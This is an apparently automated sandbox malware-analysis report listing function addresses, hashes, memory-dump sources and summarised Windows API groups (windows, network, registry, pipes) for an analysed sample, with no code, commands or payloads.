                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e552656ad26ad0b4c81c10bd500660535feecaec2312c49fbee9d36c63c42a0a
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C3919022E0964681FB749A15D4543B9B395EFA4B84F5C4B32CA4DEBB91CF3EE491CB00
                                                                                                                                                                                                                    Function 00007FF656D29034 Relevance: 10.7, APIs: 7, Instructions: 153windowCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 87235514-0
                                                                                                                                                                                                                    • Opcode ID: f9339e9b515e9b8f23d28b48758f4b43b45cdaeeceea552a0e587170ddb5bff8
                                                                                                                                                                                                                    • Instruction ID: b8ea8501ca4358e04755f2427511de76b5e48fe45c6cc0bf83c7acb43b250c77
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f9339e9b515e9b8f23d28b48758f4b43b45cdaeeceea552a0e587170ddb5bff8
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1151B262A0D2D155F7718B73590067D7F91FB46BC0F8C8B74DA896BB86CE2AE491C310
                                                                                                                                                                                                                    Function 00007FF656D28E18 Relevance: 10.6, APIs: 7, Instructions: 145windowCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 87235514-0
                                                                                                                                                                                                                    • Opcode ID: e18e0e2c600af16f3ee63314e1511203568865ab3516c571b9de0b17f9c371ff
                                                                                                                                                                                                                    • Instruction ID: 7bd5cf322f802a4ee4fdd2550371d703645282cd6cdbd41bc700b893d647f52c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e18e0e2c600af16f3ee63314e1511203568865ab3516c571b9de0b17f9c371ff
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DB51B422A0C2D155F7B187715900B7E6F61FB86BC4F4C8B74DA8997E86CE1EE458C321
                                                                                                                                                                                                                    Function 00007FF656D3DBF0 Relevance: 10.6, APIs: 7, Instructions: 137networkCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Internet$CloseConnectErrorEventHandleHttpLastOpenRequest
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3401586794-0
                                                                                                                                                                                                                    • Opcode ID: 253a407ca22485da5ca56320f2061644023828f6bd6f560db9f49e2617228af6
                                                                                                                                                                                                                    • Instruction ID: fc2965e02ccffabd4ca95b3c9d9efbfd4cc55bbac84827ae4caec85054a872a5
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 253a407ca22485da5ca56320f2061644023828f6bd6f560db9f49e2617228af6
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D3519266B0878286E714DF22E940AAE77A0FB88BC8F184735DE0D67B54DF3AD455CB40
                                                                                                                                                                                                                    Function 00007FF656D24860 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 124comlibraryloaderCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: From$ErrorModeProg$AddressCreateFreeInstanceProcStringTasklstrcmpi
                                                                                                                                                                                                                    • String ID: DllGetClassObject
                                                                                                                                                                                                                    • API String ID: 668425406-1075368562
                                                                                                                                                                                                                    • Opcode ID: 214bc254c47588fde01e5fc27ee3c6930efb076d9c02937a19424ffc77af6643
                                                                                                                                                                                                                    • Instruction ID: 6d5a92c5512bf37bcb214de1d67452c0e335d79904791109aa5b37e92f8d699b
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 214bc254c47588fde01e5fc27ee3c6930efb076d9c02937a19424ffc77af6643
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EA517C62A08B8692EB14CF16E9407796360FB44B84F084B35DF4DABA55DF7EE0A4C700
                                                                                                                                                                                                                    Function 00007FF656D59248 Relevance: 10.6, APIs: 7, Instructions: 111windowCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: LongMessageSendWindow
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3360111000-0
                                                                                                                                                                                                                    • Opcode ID: 10b92532f4478cd50d58fa8196457338f991273d8d1c085252422c4c1f4f913a
                                                                                                                                                                                                                    • Instruction ID: 9aaf052a4dd9ca09e5503da3f7c12a5d9ffb3bdec55ccc60a72f4e33f2eccc56
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 10b92532f4478cd50d58fa8196457338f991273d8d1c085252422c4c1f4f913a
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4E413F36A19A8581FB608B19E4906793360EBD5F94F584732CE1EA7FA4CF3EE441C700
                                                                                                                                                                                                                    Function 00007FF656D437A8 Relevance: 10.6, APIs: 7, Instructions: 103networkCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ErrorLastinet_addrsocket
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 4170576061-0
                                                                                                                                                                                                                    • Opcode ID: 6f732a3ceb6dc8ae0713a757b729ef5f32bd0ba729350ec97b60288269ebfabf
                                                                                                                                                                                                                    • Instruction ID: b721f4fb91e44b5d04947edd67dfa4524a14c40dc175317662e1bd2a6c270efd
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6f732a3ceb6dc8ae0713a757b729ef5f32bd0ba729350ec97b60288269ebfabf
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7741B472A0C68282EB209F26E4442AD7360FB44BE5F494731DEAE93795CFBED845C700
                                                                                                                                                                                                                    Function 00007FF656D5A884 Relevance: 10.6, APIs: 7, Instructions: 98windowCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 161812096-0
                                                                                                                                                                                                                    • Opcode ID: 22fcd4b96cb08b999353f17b01c1e421480795c8207f5970277f026457662bef
                                                                                                                                                                                                                    • Instruction ID: db1cb4b01a1647e8f845feb5beaae169560fc070fc2b39741451237e66a6e7c3
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 22fcd4b96cb08b999353f17b01c1e421480795c8207f5970277f026457662bef
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 84416D36A04B5585EB50CF26D4806AC37B0FB94B98F594635DE4DA7B64CF3EE885C700
                                                                                                                                                                                                                    Function 00007FF656D515C4 Relevance: 10.6, APIs: 7, Instructions: 90registryCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 395352322-0
                                                                                                                                                                                                                    • Opcode ID: fa94a490bcff5352d4611bed330528fad8175282c266d08f0e682cee49e7ebff
                                                                                                                                                                                                                    • Instruction ID: 226add6b581974d0eb4c6f690059e934ae7beb0b5f5a86690ac05316aad8c3f4
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fa94a490bcff5352d4611bed330528fad8175282c266d08f0e682cee49e7ebff
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 71419232A1CB8586E720CF11E4547EA63A0FB89788F480731EA8D97E58DF7ED149CB40
                                                                                                                                                                                                                    Function 00007FF656D24FCC Relevance: 10.6, APIs: 7, Instructions: 76memoryCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3761583154-0
                                                                                                                                                                                                                    • Opcode ID: 19c7bf02fe4c98a4d3570af08ff0fb72ad004095e035640b2260bfb13cdf122c
                                                                                                                                                                                                                    • Instruction ID: 93d2a42942d745c510445a9468ae512adf2dec5b9d2d6064e561e4192da3edc5
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 19c7bf02fe4c98a4d3570af08ff0fb72ad004095e035640b2260bfb13cdf122c
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F7318C21A08B4685DB209F13E94456973A1EB89FE4F4C8736DA5EA37A0CF3EE484C344
                                                                                                                                                                                                                    Function 00007FF656D24EB0 Relevance: 10.6, APIs: 7, Instructions: 74memoryCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AllocByteCharMultiStringWide
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3603722519-0
                                                                                                                                                                                                                    • Opcode ID: a9930bff742c05b715584941b92a6a4a9495450700c62842a106a105f94bde5c
                                                                                                                                                                                                                    • Instruction ID: 5312d5120ca6fac7abbe29ac415ccb999cfaeca4d6bbdaf3c9f8d2c2eb713997
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a9930bff742c05b715584941b92a6a4a9495450700c62842a106a105f94bde5c
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C4314021A08A4589EB209F12E844179B3A0FB88FD0F4C8736DE9D93795DF3DE584C700
                                                                                                                                                                                                                    Function 00007FF656D5AEDC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69windowCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: MessageSend$CreateObjectStockWindow
                                                                                                                                                                                                                    • String ID: Msctls_Progress32
                                                                                                                                                                                                                    • API String ID: 1025951953-3636473452
                                                                                                                                                                                                                    • Opcode ID: 175e965b11afd85df2c3a996d4a298cb258778d92a24fde76c77afeddb8f143d
                                                                                                                                                                                                                    • Instruction ID: f5bcdb67d78d65145a1ccac5bceefc450a03e263a58465eacc5f62544f7390a7
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 175e965b11afd85df2c3a996d4a298cb258778d92a24fde76c77afeddb8f143d
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8331783260869187E3608F25F484B5AB761EBC8790F149639EB8893F98CF3DD885CF00
                                                                                                                                                                                                                    Function 00007FF656D2F9EC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 65pipeCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CreateHandlePipe
                                                                                                                                                                                                                    • String ID: nul
                                                                                                                                                                                                                    • API String ID: 1424370930-2873401336
                                                                                                                                                                                                                    • Opcode ID: c3b93562104d94dec8cab7a09dad708560240dd78c66e81481d559291ba52c16
                                                                                                                                                                                                                    • Instruction ID: 4945b95ec5f4f9e70aadcff13728ad26dfca305076b3b0921f2453d579cd9163
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c3b93562104d94dec8cab7a09dad708560240dd78c66e81481d559291ba52c16
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A8219132A58B4682EB108B24D814779B3A0FB85BB8F584B35DA6E977D4DF7ED044C700
                                                                                                                                                                                                                    Function 00007FF656D2FAFC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 65pipeCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CreateHandlePipe
                                                                                                                                                                                                                    • String ID: nul
                                                                                                                                                                                                                    • API String ID: 1424370930-2873401336
                                                                                                                                                                                                                    • Opcode ID: 0134d29867f6a044a915cc83a074af2c17d8f13ec2a8203597b3b6c722d2df41
                                                                                                                                                                                                                    • Instruction ID: ce0ba017bbeb43adf21de7ed52dd8f2f3923e6dd64d2fa5008c6514b8e06148a
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0134d29867f6a044a915cc83a074af2c17d8f13ec2a8203597b3b6c722d2df41
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 45318D72A58B4682EB108B24D824379B3A0EF85BB8F580B34DA7D967D4CF7EE445C701
                                                                                                                                                                                                                    Function 00007FF656CB8F40 Relevance: 9.2, APIs: 6, Instructions: 246COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Rect$Client$Window$MetricsScreenSystem
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3220332590-0
                                                                                                                                                                                                                    • Opcode ID: d8f977ea4750bda3b048e49f0aa9ed333f17e400e230103ea3ed7eb9902d4993
                                                                                                                                                                                                                    • Instruction ID: eddf0479a400f65ff9b903dd867257afdefd31e006dcd4ee69b4a88e98952165
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d8f977ea4750bda3b048e49f0aa9ed333f17e400e230103ea3ed7eb9902d4993
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 40A129A7A1429386E7648F71C4447BD73B0FF45B58F581135DE19EBAA4EE3E9840E310
                                                                                                                                                                                                                    Function 00007FF656CDA054 Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 492COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
